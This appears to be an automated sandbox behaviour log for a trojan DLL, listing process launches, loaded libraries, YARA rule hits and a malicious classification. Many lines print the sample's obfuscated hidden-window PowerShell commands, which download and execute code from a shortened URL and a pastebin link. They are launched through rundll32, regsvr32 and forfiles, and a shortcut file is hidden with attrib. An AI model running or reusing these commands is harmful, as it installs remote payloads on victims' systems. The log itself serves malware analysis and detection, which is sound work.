Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD3478C71224_2_00007FFD3478C712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD3478B96624_2_00007FFD3478B966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD34784CAC24_2_00007FFD34784CAC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD347825F524_2_00007FFD347825F5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD34787EF824_2_00007FFD34787EF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD34797E7724_2_00007FFD34797E77
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD347818B824_2_00007FFD347818B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD3478D1B124_2_00007FFD3478D1B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD3478B3E024_2_00007FFD3478B3E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD3478B3B024_2_00007FFD3478B3B0
Source: amsi64_2536.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_4040.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_2992.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_1396.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_2248.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_3780.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2536, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4040, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2992, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1396, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2248, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.troj.evad.winDLL@39/19@5/5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1220:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:644:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_naivbnpe.phl.ps1Jump to behavior
Source: HQsitBLlOv.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\HQsitBLlOv.dll,DllRegisterServer
Source: HQsitBLlOv.dllReversingLabs: Detection: 42%
Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\HQsitBLlOv.dll"
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\HQsitBLlOv.dll
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\HQsitBLlOv.dll,DllRegisterServer
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\HQsitBLlOv.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\HQsitBLlOv.dll,DllRegisterServerJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
